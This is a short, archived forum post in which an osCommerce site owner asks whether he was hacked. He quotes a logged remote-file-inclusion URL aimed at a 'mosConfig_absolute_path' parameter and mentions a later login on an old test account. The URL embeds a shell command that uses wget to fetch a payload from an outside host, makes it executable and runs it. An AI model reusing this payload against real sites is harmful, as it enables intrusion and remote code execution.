Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Did I get hacked today?


draxion

Recommended Posts

Posted

Hi,

 

I'm wondering if anyone can help me out. I noticed the following in my web stats today and assumed it was just another attempted to try and hack my site. Here's the url that was recorded:

 

http://66.49.232.190/index.php?option=com_...x2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicup

 

I've gotten a few of these in the past and have simply denied access to the IPs. They never seem to appear again.

 

But this time, about an hour later, I noticed someone logged on using an old test account that I created a few months back. They logged on for about 8 minutes and then loged off using my logoff.php page. Strange. The originating IP address is not the same but both IP addresses are from the same ISP; MCI.

 

I'm wondering what happened. Did someone get a hold of my accounts and passwords? How did this happen? Anyone have any ideas?

 

 

Thanks

Shayne

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...